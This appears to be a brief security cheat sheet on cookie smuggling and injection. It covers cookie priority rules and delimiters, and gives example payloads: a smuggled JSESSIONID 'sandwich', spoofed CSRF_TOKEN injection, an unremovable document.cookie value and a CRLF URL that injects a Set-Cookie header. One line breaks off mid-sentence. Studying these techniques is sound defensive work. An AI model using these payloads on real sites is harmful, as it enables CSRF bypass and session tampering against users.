What is Cookie Smuggling and Injection
Cookie smuggling and injection exploit frontend vulnerabilities and the way servers interpret cookies, enabling attackers to smuggle cookies or retrieve HTTPS cookies.
Blog Article: Here (opens in a new tab)
Exploitation
Cookie Priority
# Default
1. Path length, longest to shortest
2. Last updated time, least recent to most recent
# Set Priority
- To target an already specific path, you can URL-encode the "/" character, making the URL longer while the server interprets it the same way.Cookie Delimitation
# Type of delimiter
- "
- ;
- ,
- [SPACE]Cookie Smuggling & Injection
# Smuggling & Injection
## Smuggling
RENDER_TEXT="**hello world; JSESSIONID=13371337; ASDF=end**"; ---> Single Cookie
## Injection
LANGUAGE="**en-us" CSRF_TOKEN="SPOOFED_VALUE**" ---> Inject cookie with Space
LANGUAGE=**en-us,CSRF_TOKEN=SPOOFED_VALUE** ---> Inject cookie with
- Smuggling: Injecting two vulnerable cookies around a target creates a "sandwich," causing the parser to treat them as one.
- Injection: Allows attackers to inject cookies, overwriting others to bypass CSRF tokens.
## Extra
document.cookie = "�=meep"; ---> Cookie that can't be removed
---------------------------------------------------------------------------------
# Injection via URL (CRLF %0D%0A Injection)
/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None